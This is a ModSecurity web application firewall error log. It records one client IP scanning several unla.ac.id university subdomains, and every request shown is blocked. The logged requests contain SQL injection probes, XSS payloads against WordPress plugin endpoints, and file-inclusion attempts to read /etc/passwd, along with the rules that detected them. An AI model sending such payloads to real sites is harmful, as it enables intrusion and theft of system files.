[Tue Aug 29 11:53:34.751874 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zsCo-f0AAAn407gAAAAW"]
[Tue Aug 29 11:53:35.091021 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15z8Co-f0AAAot8RgAAAAn"]
[Tue Aug 29 11:53:35.098723 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoz73MAAAAS"]
[Tue Aug 29 11:53:35.306255 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoUJcIAAAAB"]
[Tue Aug 29 11:53:35.329781 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15z8Co-f0AAAot8RoAAAAn"]
[Tue Aug 29 11:53:35.747492 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAo2m48AAAAA"]
[Tue Aug 29 11:53:35.774040 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15z8Co-f0AAAoT7ZwAAAAD"]
[Tue Aug 29 11:53:35.871356 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoXJzIAAAAP"]
[Tue Aug 29 11:53:35.901513 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAowNrQAAAAH"]
[Tue Aug 29 11:53:35.916148 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoXJzMAAAAP"]
[Tue Aug 29 11:53:35.988660 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAni-F4AAAAU"]
[Tue Aug 29 11:53:37.324297 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO150cCo-f0AAAn408IAAAAW"]
[Tue Aug 29 11:53:37.327679 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAot8SEAAAAn"]
[Tue Aug 29 11:53:37.332241 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoT7aIAAAAD"]
[Tue Aug 29 11:53:37.451803 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoz73wAAAAS"]
[Tue Aug 29 11:53:37.457985 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO150cCo-f0AAAofm9MAAAAX"]
[Tue Aug 29 11:53:37.467391 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAn408QAAAAW"]
[Tue Aug 29 11:53:37.781928 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoesQQAAAAV"]
[Tue Aug 29 11:53:38.623575 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO150sCo-f0AAAoGFdgAAAAE"]
[Tue Aug 29 11:53:38.885014 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150sCo-f0AAAoqbUoAAAAj"]
[Tue Aug 29 11:53:39.077182 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAox7JEAAAAN"]
[Tue Aug 29 11:53:39.079257 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoqbUsAAAAj"]
[Tue Aug 29 11:53:39.079715 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAot8ScAAAAn"]
[Tue Aug 29 11:53:39.083125 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoUJc4AAAAB"]
[Tue Aug 29 11:53:39.612986 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAn408sAAAAW"]
[Tue Aug 29 11:53:41.884353 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApJDSIAAAAY"]
[Tue Aug 29 11:53:41.907516 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApIdigAAAAU"]
[Tue Aug 29 11:53:41.907515 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApJDSMAAAAY"]
